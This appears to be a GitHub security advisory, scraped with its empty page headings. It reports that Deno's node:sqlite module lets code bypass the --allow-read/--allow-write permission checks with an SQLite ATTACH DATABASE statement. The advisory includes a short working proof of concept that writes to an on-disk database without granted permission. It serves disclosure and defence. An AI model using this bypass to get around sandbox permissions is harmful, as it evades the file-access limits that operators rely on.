--allow-read / --allow-write permission bypass in `node:sqlite`

Summary

It is possible to bypass Deno's read/write permission checks by using ATTACH DATABASE statement.

PoC

// poc.js
import { DatabaseSync } from "node:sqlite"

const db = new DatabaseSync(":memory:");
db.exec("ATTACH DATABASE 'test.db' as test;");

db.exec("CREATE TABLE test.test (id INTEGER PRIMARY KEY, name TEXT);");

$ deno poc.js

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

--allow-read / --allow-write permission bypass in `node:sqlite`

Package

Affected versions

Patched versions

Description

Summary

PoC

Severity

CVE ID

Weaknesses

Credits